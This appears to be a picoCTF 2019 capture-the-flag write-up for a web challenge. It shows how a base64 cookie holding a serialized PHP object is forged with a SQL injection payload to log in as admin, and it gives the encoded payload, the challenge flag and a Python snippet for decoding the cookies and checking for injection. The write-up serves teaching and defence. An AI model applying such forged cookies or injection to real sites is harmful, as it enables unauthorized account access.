Web – cereal hacker 1

cereal hacker 1 - 450pt

Challenge

Login as admin. https://2019shell1.picoctf.com/problem/49879/ or http://2019shell1.picoctf.com:49879

Hints

No hints

Solution

After a quick look at the code I tried to exploit the file parameter in the URL, but with no result; after a lot of guessing we figured out one page name: admin

It will be fundamental later. After a ton of guessing and a little hint from the official picoCTF Discord we found that the credentials to log in as a regular user were: username=guest and password=guest

The really interesting part of this page is the cookies: after logging in there is a new base64-encoded cookie called user_info

TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiZ3Vlc3QiO3M6ODoicGFzc3dvcmQiO3M6NToiZ3Vlc3QiO30%253D

After decoding it I found out that it was a serialized PHP object (click [here]() if you want to know more about serialization in PHP)

O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}6p

So after a few tries I tried an SQL injection in the password field and it worked!!

Payload:

TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoicGFzc3dvcmQiO3M6MTI6ImEnIG9yICcxJz0nMSI7fTZw

Actual serialized message:

O:11:"permissions":2:{s:8:"username";s:5:"admin";s:8:"password";s:12:"a' or '1'='1";}6p

After sending it as the user_info cookie on the admin page, the server returned the flag

picoCTF{0d040919669d2bc1501212f90450eb4c}
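As an added illustration (not part of the original write-up), the Python below decodes the two user_info cookies quoted above, parses the PHP-serialized permissions object, and applies the check a server should perform before those fields reach any query. The two cookie constants are copied from this page; the parser and the check are mine and assume the flat object layout shown here.

```python
import base64
import re
from urllib.parse import unquote

# Constructed copies of the two cookie values quoted in the write-up.
GUEST_COOKIE = ("TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiZ3Vlc3QiO3M6ODoi"
                "cGFzc3dvcmQiO3M6NToiZ3Vlc3QiO30%253D")
FORGED_COOKIE = ("TzoxMToicGVybWlzc2lvbnMiOjI6e3M6ODoidXNlcm5hbWUiO3M6NToiYWRtaW4iO3M6ODoi"
                 "cGFzc3dvcmQiO3M6MTI6ImEnIG9yICcxJz0nMSI7fTZw")

def decode_cookie(value: str) -> bytes:
    # The '=' padding reaches the server as %253D (URL-encoded twice): unquote twice.
    return base64.b64decode(unquote(unquote(value)))

def _read_php_string(blob: bytes, pos: int):
    # s:<len>:"<bytes>"; -- the declared length, not the quotes, delimits the value,
    # so quotes and spaces inside it survive a round trip untouched.
    m = re.compile(rb's:(\d+):"').match(blob, pos)
    if not m:
        raise ValueError(f"expected string at offset {pos}")
    start = m.end()
    end = start + int(m.group(1))
    if blob[end:end + 2] != b'";':
        raise ValueError(f"string length mismatch at offset {start}")
    return blob[start:end].decode(), end + 2

def parse_permissions(blob: bytes):
    """Parse the flat O:<n>:"class":<k>:{...} form of this cookie (string members only)."""
    m = re.match(rb'O:\d+:"([^"]*)":(\d+):\{', blob)
    if not m:
        raise ValueError("not a serialized PHP object with string members")
    cls, count, pos = m.group(1).decode(), int(m.group(2)), m.end()
    fields = {}
    for _ in range(count):
        key, pos = _read_php_string(blob, pos)
        fields[key], pos = _read_php_string(blob, pos)
    if blob[pos:pos + 1] != b"}":
        raise ValueError("missing closing brace")
    # Bytes after '}' (the "6p" in the write-up) are tolerated by PHP's unserialize().
    return cls, fields, blob[pos + 1:]

def suspicious_fields(fields: dict) -> list:
    # Server-side check: credential values carrying quote characters or SQL comment
    # markers should be rejected and logged before they reach any query.
    bad = re.compile(r"""['"]|--|;""")
    return sorted(k for k, v in fields.items() if bad.search(v))
```

Rejecting such values is only a stopgap; the real fix is to query with bound parameters so that deserialized cookie data can never change the SQL structure.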
